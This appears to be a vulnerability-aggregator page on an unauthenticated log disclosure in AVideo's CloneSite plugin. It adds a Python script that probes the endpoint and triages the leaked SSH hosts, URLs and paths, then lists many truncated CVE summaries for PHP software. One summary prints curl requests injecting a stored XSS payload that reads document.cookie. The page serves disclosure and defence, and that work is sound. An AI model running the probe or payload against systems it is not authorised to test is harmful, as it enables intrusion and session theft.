CVE-2026-35452
Published 2026-04-06
Priority P4 · 32 · Severity medium · CVSS 3.1 base score 5.3
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
EPSS 0.37% (28.6th percentile)
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/CloneSite/client.log.php endpoint serves the clone operation log file without any authentication. Every other endpoint in the CloneSite plugin directory enforces User::isAdmin(). The log contains internal filesystem paths, remote server URLs, and SSH connection metadata.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wwbn | avideo | <= 26.0 | — |
| wwbn | avideo | 0 – 26.0 | — |
GHSA (2026-04-04)
CVE-2026-35452 [MEDIUM] CWE-200: AVideo: Unauthenticated Information Disclosure via Missing Auth on CloneSite client.log.php
## Summary
The `plugin/CloneSite/client.log.php` endpoint serves the clone operation log file without any authentication. Every other endpoint in the CloneSite plugin directory enforces `User::isAdmin()`. The log contains internal filesystem paths, remote server URLs, and SSH connection metadata.
## Details
The advisory reproduces the full source of `plugin/CloneSite/client.log.php`; only this single line of that listing survived extraction on this page:
```php
add("Clone (2 of {$totalSteps}): Geting MySQL Dump file [$cmd]");
```
The `$cmd` variable contains wget commands with internal filesystem paths, and rsync command templates with SSH connection details (username, IP, port).
Compare with sibling endpoints:
- `plugin/CloneSite/index.php` checks `User::isAdmin()`
- `plugin/CloneSite/
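An added check-and-triage script for the bug described above. This is example code written for this page, not code from AVideo or from the advisory. It assumes the endpoint path the advisory names, `plugin/CloneSite/client.log.php`, and a generic `Clone (N of M): step [command]` line layout modelled on the one `add(...)` call quoted; the regexes, the verdicts in `classify` and the sample log are all this example's own constructions, not the project's. `probe` fetches the endpoint with no session and reports whether the log comes back; `extract_exposure` lists what an exposed log gives away, which is what decides which SSH credentials and hosts need rotating. The affected-range table above lists no fixed version, so the check is worth running against your own deployment.

```python
"""Exposure check and triage for CVE-2026-35452 (unauthenticated
plugin/CloneSite/client.log.php). Added example; not AVideo project code."""
import re
import sys
from dataclasses import dataclass, field
from urllib.error import HTTPError
from urllib.request import Request, urlopen

ENDPOINT = "plugin/CloneSite/client.log.php"   # path named in the advisory

# ASSUMED log layout: "Clone (N of M): <step> [<shell command>]", modelled on the
# single add(...) call the advisory quotes. The regexes are deliberately loose.
PORT_RE = re.compile(r"ssh\s+-p\s*(\d+)")                                  # ssh -p 2222
USER_HOST_RE = re.compile(r"([A-Za-z0-9._-]+)@([A-Za-z0-9.-]+):(/\S*)?")   # user@host:/path
URL_RE = re.compile(r"https?://[^\s\"'\]]+")
PATH_RE = re.compile(r"(?<![\w@:./-])/(?:var|home|opt|etc|srv|tmp|usr)/[^\s\"'\]]*")

# Constructed sample for this example, not a capture from a real instance.
SAMPLE_LOG = """\
Clone (1 of 4): Checking connection [wget -q -O /var/www/html/videos/cache/config.json https://old-site.example.com/plugin/CloneSite/config.json]
Clone (2 of 4): Geting MySQL Dump file [wget -q -O /var/www/html/videos/backup/avideo.sql https://old-site.example.com/videos/backup/avideo.sql]
Clone (3 of 4): Syncing videos [rsync -avz -e "ssh -p 2222" deploy@10.0.4.17:/var/www/html/videos/ /var/www/html/videos/]
Clone (4 of 4): Done
"""


@dataclass
class Exposure:
    ssh_targets: set[tuple[str, str, int]] = field(default_factory=set)  # (user, host, port)
    remote_urls: set[str] = field(default_factory=set)
    paths: set[str] = field(default_factory=set)


def extract_exposure(log_text: str) -> Exposure:
    """Pull out the items the advisory says the log leaks: SSH user/host/port,
    remote server URLs and filesystem paths. Feed it the body of an exposed log."""
    exp = Exposure()
    for line in log_text.splitlines():
        port = PORT_RE.search(line)
        for user, host, path in USER_HOST_RE.findall(line):
            exp.ssh_targets.add((user, host, int(port.group(1)) if port else 22))
            if path:
                exp.paths.add(path)
        exp.remote_urls.update(URL_RE.findall(line))
        exp.paths.update(PATH_RE.findall(line))
    return exp


def classify(status: int, body: str) -> str:
    """Heuristic verdict for an unauthenticated GET of the endpoint."""
    if status == 404:
        return "absent"        # CloneSite plugin not deployed at this path
    if status in (401, 403):
        return "guarded"
    if status == 200 and "Clone (" in body:
        return "exposed"       # the clone log was served to an anonymous client
    return "unclear"           # e.g. a login page reached via redirect: inspect by hand


def probe(base_url: str, timeout: float = 10.0) -> tuple[str, str]:
    """Live check against an instance you are authorized to test. Returns (verdict, body).
    urlopen follows redirects, so a bounce to a login page shows up as 'unclear'."""
    url = base_url.rstrip("/") + "/" + ENDPOINT
    req = Request(url, headers={"User-Agent": "cve-2026-35452-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read(1_000_000).decode("utf-8", "replace")
    except HTTPError as err:
        status, body = err.code, ""
    return classify(status, body), body


def report(exp: Exposure) -> None:
    for user, host, port in sorted(exp.ssh_targets):
        print(f"rotate SSH credential: {user}@{host} port {port}")
    for url in sorted(exp.remote_urls):
        print(f"remote URL disclosed: {url}")
    for path in sorted(exp.paths):
        print(f"filesystem path disclosed: {path}")


if __name__ == "__main__":
    if len(sys.argv) > 1:                      # python check.py https://videos.example.com
        verdict, body = probe(sys.argv[1])
        print("verdict:", verdict)
        if verdict == "exposed":
            report(extract_exposure(body))
    else:                                      # offline demo on the constructed sample
        report(extract_exposure(SAMPLE_LOG))
```

Run it with no argument to see the triage on the built-in sample, or with your base URL to probe a live instance you are authorized to test. The server-side fix is the one the advisory points at: the same `User::isAdmin()` guard every sibling CloneSite endpoint already enforces, placed before anything is read from the log file. Until a patched release is deployed, a web-server rule denying that path, and rotating any SSH credential that appears in an exposed log, are the practical stopgaps (a suggestion of this example, not something the advisory states).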
OSV (2026-04-04)
CVE-2026-35452 [MEDIUM] AVideo: Unauthenticated Information Disclosure via Missing Auth on CloneSite client.log.php
Body identical to the GHSA advisory above.
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-34368 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-34368 [MEDIUM] CVE-2026-34368 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34368 :
PHP vulnerability analysis and mitigation
transferBalance()
plugin/YPTWallet/YPTWallet.php
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 31, 2026
Wiz
CVE-2026-29113 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2026-29113 [LOW] CVE-2026-29113 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29113 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 4.17.4 and 5.9.7, Craft CMS has a CSRF issue in the preview token endpoint at /actions/preview/create-token. The endpoint accepts an attacker-supplied previewToken. Because the action does not require POST and does not enforce a CSRF token, an attacker can force a logged-in victim editor to mint a preview token chosen by the attacker. That token can then be used by the attacker (without authentication) to access previewed/unpublished content tied to the victim’s authorized preview scope. This vulnerability is fixed in 4.17.4 and 5.9.7.
Source : NVD
## 2.3
Score
Published March 10, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Craft CMS
Has Public Expl
Wiz
CVE-2026-25488 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25488 [MEDIUM] CVE-2026-25488 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25488 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Tax Categories (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Wiz
CVE-2026-25486 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25486 [MEDIUM] CVE-2026-25486 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25486 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. From version 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Methods Name field in the Store Management section is not properly sanitized before being displayed in the admin panel. This issue has been patched in version 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and li
Wiz
CVE-2026-25495 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-25495 [HIGH] CVE-2026-25495 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25495 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the element-indexes/get-elements endpoint is vulnerable to SQL Injection via the criteria[orderBy] parameter (JSON body). The application fails to sanitize this input before using it in the database query. An attacker with Control Panel access can inject arbitrary SQL into the ORDER BY clause by omitting viewState[order] (or setting both to the same payload). This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 8.7
Score
Published February 9, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Relea
Wiz
CVE-2026-32278 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-32278 [HIGH] CVE-2026-32278 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32278 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, a Stored Cross-site Scripting (XSS) issue exists in the file field of the Form Plugin. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 4.8
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 24, 2026
Wiz
GHSA-gmpc-fxg2-vcmq Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-gmpc-fxg2-vcmq Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-gmpc-fxg2-vcmq :
PHP vulnerability analysis and mitigation
## Summary
Only the inline code identifiers of this advisory survived extraction here; the prose around them is missing. Summary: `htmlspecialchars()`.
## Details
Locations named by the advisory: `HTMLMenuRight.php:24`, `HTMLMenuRight.php:40`, `HTMLMenuLeft.php:32`, `index.php:49` (`getText(); ?>`), `menuItemSave.json.php`. Checks named: `User::isAdmin()`, `isGlobalTokenValid()`.
## Proof of Concept
As an admin user, save a menu item with a malicious icon class:
```shell
curl -b "PHPSESSID=ADMIN_SESSION" \
  -X POST "https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php" \
  -d 'icon=fa-home" onmouseover="alert(document.cookie)&text=Home&url=/&status=a'
```
Alternatively, inject via the URL field to create a JavaScript link:
curl -b "PHPSESSID=ADMIN_SESSION" \
-X POST "https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php" \
-d 'icon=fa-link&t
Wiz
CVE-2026-33295 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-33295 [HIGH] CVE-2026-33295 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33295 :
PHP vulnerability analysis and mitigation
clean_title
Source : NVD
## 8.2
Score
Published March 22, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 20, 2026
Wiz
CVE-2026-34564 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34564 [CRITICAL] CVE-2026-34564 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34564 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when adding Pages to navigation menus through the Menu Management functionality. Page-related data selected via the Pages section is stored server-side and rendered without proper output encoding. This stored payload is later rendered unsafely within administrative interfaces and public-facing navigation menus, leading to stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9.1
Score
Published April 1, 2026
Severity CRITICAL
CNA Scor
Wiz
CVE-2026-33501 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33501 [MEDIUM] CVE-2026-33501 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33501 :
PHP vulnerability analysis and mitigation
plugin/Permissions/View/Users_groups_permissions/list.json.php
add.json.php
delete.json.php
index.php
User::isAdmin()
Source : NVD
## 5.3
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 21, 2026
Wiz
CVE-2026-27697 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27697 [MEDIUM] CVE-2026-27697 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27697 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has a SQL injection vulnerability in blog posts. This issue has been patched in version 5.2.3.
Source : NVD
## 6.9
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
baserproject/basercms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Apr 02, 2026
Wiz
CVE-2026-23524 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-23524 [CRITICAL] CVE-2026-23524 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23524 :
PHP vulnerability analysis and mitigation
Laravel Reverb provides a real-time WebSocket communication backend for Laravel applications. In versions 1.6.3 and below, Reverb passes data from the Redis channel directly into PHP’s unserialize() function without restricting which classes can be instantiated, which leaves users vulnerable to Remote Code Execution. The exploitability of this vulnerability is increased because Redis servers are commonly deployed without authentication, but only affects Laravel Reverb when horizontal scaling is enabled (REVERB_SCALING_ENABLED=true). This issue has been fixed in version 1.7.0. As a workaround, require a strong password for Redis access and ensure the service is only accessible via a private network or local loopback, and/or set
Wiz
GHSA-hr7j-63v7-vj7g Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-hr7j-63v7-vj7g Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-hr7j-63v7-vj7g :
PHP vulnerability analysis and mitigation
## Summary
Deleting a user account with SFTP access or changing the user's password does not immediately terminate existing SFTP sessions, allowing continued filesystem access after credentials are revoked.
This can result in unintended and unauthorized access to server files even after administrators believe access has been fully invalidated.
## Details
When a user with SFTP access is deleted from the Pterodactyl Panel or when the user's password is changed while one or more SFTP connections are active, those existing connections remain fully functional.
Neither account deletion nor password change invalidates the authentication state of already-established SFTP sessions. As a result, the active SFTP connection poo
Wiz
CVE-2026-33485 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33485 [HIGH] CVE-2026-33485 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33485 :
PHP vulnerability analysis and mitigation
on_publish
plugin/Live/on_publish.php
$_POST['name']
LiveTransmitionHistory::getLatest()
LiveTransmition::keyExists()
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 43.1
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
Wiz
CVE-2026-25129 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.7
CVE-2026-25129 [MEDIUM] CVE-2026-25129 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25129 :
PHP vulnerability analysis and mitigation
.psysh.php
.psysh.php
php artisan tinker
.psysh.php
Source : NVD
## 7.3
Score
Published January 30, 2026
Severity HIGH
CNA Score 6.7
Affected Technologies
PHP
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
psy/psysh
psysh
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 31, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 03, 2026
Wiz
CVE-2026-33499 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-33499 [MEDIUM] CVE-2026-33499 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33499 :
PHP vulnerability analysis and mitigation
view/forbiddenPage.php
view/warningPage.php
$_REQUEST['unlockPassword']
value
Source : NVD
## 6.1
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 21, 2026
Wiz
CVE-2026-31820 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-31820 [HIGH] CVE-2026-31820 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31820 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. An authenticated Insecure Direct Object Reference (IDOR) vulnerability exists in multiple shop LiveComponents due to unvalidated resource IDs accepted via #[LiveArg] parameters. Unlike props, which are protected by LiveComponent's @checksum, args are fully user-controlled - any action that accepts a resource ID via #[LiveArg] and loads it with ->find() without ownership validation is vulnerable. Checkout address FormComponent (addressFieldUpdated action): Accepts an addressId via #[LiveArg] and loads it without verifying ownership, exposing another user's first name, last name, company, phone number, street, city, postcode, and country. Cart WidgetComponent (refreshCart
Wiz
CVE-2026-27127 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2026-27127 [HIGH] CVE-2026-27127 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27127 :
PHP vulnerability analysis and mitigation
Source : NVD
## 7
Score
Published February 24, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/cms
cpe:2.3:a:craftcms:craft_cms
Sources
Composer Severity HIGH Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 24, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 03, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 03, 2026
Wiz
CVE-2025-67857 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2025-67857 [MEDIUM] CVE-2025-67857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67857 :
PHP vulnerability analysis and mitigation
A flaw was found in moodle. During anonymous assignment submissions, user identifiers were inadvertently exposed in URLs. This data exposure allows unauthorized viewers to see internal user IDs, compromising the intended anonymity and potentially leading to information disclosure.
Source : NVD
## 5.3
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle/moodle
moodle
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 04, 2026
Nix Severity MEDIUM
Wiz
CVE-2025-55988 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-55988 [HIGH] CVE-2025-55988 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-55988 :
PHP vulnerability analysis and mitigation
An issue in the component /Controllers/RestController.php of DreamFactory Core v1.0.3 allows attackers to execute a directory traversal via an unsanitized URI path.
Source : NVD
## 7.2
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
dreamfactory/df-core
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 21, 2026
Wiz
CVE-2026-25496 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-25496 [MEDIUM] CVE-2026-25496 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25496 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, a stored XSS vulnerability exists in the Number field type settings. The Prefix and Suffix fields are rendered using the |md|raw Twig filter without proper escaping, allowing script execution when the Number field is displayed on users' profiles. This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 4.8
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPS
Wiz
CVE-2026-34362 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-34362 [MEDIUM] CVE-2026-34362 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34362 :
PHP vulnerability analysis and mitigation
verifyTokenSocket()
plugin/YPTSocket/functions.php
Source : NVD
## 5.4
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 31, 2026
Wiz
CVE-2025-67852 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.5
CVE-2025-67852 [LOW] CVE-2025-67852 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67852 :
PHP vulnerability analysis and mitigation
A flaw was found in Moodle. An open redirect vulnerability in the OAuth login flow allows a remote attacker to redirect users to attacker-controlled pages after they have successfully authenticated. This occurs due to insufficient validation of redirect parameters, which could lead to phishing attacks or information disclosure.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 3.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle
moodle/moodle
Sources
NVD
Composer Severity LOW Has
Wiz
GHSA-gp56-f67f-m4px Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-gp56-f67f-m4px Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-gp56-f67f-m4px :
PHP vulnerability analysis and mitigation
Summary A critical vulnerability has been identified in CI4MS that allows an authenticated user with file editor permissions to achieve Remote Code Execution (RCE). By leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server. Vulnerability Details The vulnerability exists in the /backend/fileeditor/createFile and /backend/fileeditor/save API endpoints.
Unrestricted File Creation: The createFile endpoint allows users to create files with any extension (including .php) in web-accessible directories such as /public.
Arbitrary Content Injection: The save endpoint allows users to write arbitrary content into the created files without sufficient server-side validation
Wiz
CVE-2024-42718 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2024-42718 [MEDIUM] CVE-2024-42718 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2024-42718 :
PHP vulnerability analysis and mitigation
A path traversal vulnerability in Croogo CMS 4.0.7 allows remote attackers to read arbitrary files via a specially crafted path in the 'edit-file' parameter.
Source : NVD
## 6.5
Score
Published December 26, 2025
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
croogo/croogo
Sources
NVD
Composer Severity HIGH No Fix Added at: Dec 28, 2025
Wiz
CVE-2026-33674 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-33674 [LOW] CVE-2026-33674 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33674 :
PHP vulnerability analysis and mitigation
PrestaShop is an open source e-commerce web application. Versions prior to 8.2.5 and 9.1.0 improperly use the validation framework. Versions 8.2.5 and 9.1.0 contain a fix. No known workarounds are available.
Source : NVD
## 5.3
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 2.0
Affected Technologies
PHP
Prestashop
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cpe:2.3:a:prestashop:prestashop
prestashop/prestashop
Sources
Composer Severity LOW Has Fix Added at: Mar 26, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 29, 2026
Windows
Wiz
CVE-2026-33887 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-33887 [MEDIUM] CVE-2026-33887 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33887 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, authenticated Control Panel users could view entry revisions for any collection with revisions enabled, regardless of whether they had the required collection permissions. This bypasses the authorization checks that the main entry controllers enforce, exposing entry field values and blueprint data. Users could also create entry revisions without edit permission, though this only snapshots the existing content state and does not affect published content. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
## 5.4
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public
Wiz
CVE-2026-35543 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35543 [MEDIUM] CVE-2026-35543 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35543 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. The remote image blocking feature can be bypassed via SVG content (with animate attributes) in an e-mail message. This may lead to information disclosure or access-control bypass.
Source : NVD
## 5.3
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcube/roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MED
Wiz
CVE-2026-35035 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-35035 [HIGH] CVE-2026-35035 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35035 :
PHP vulnerability analysis and mitigation
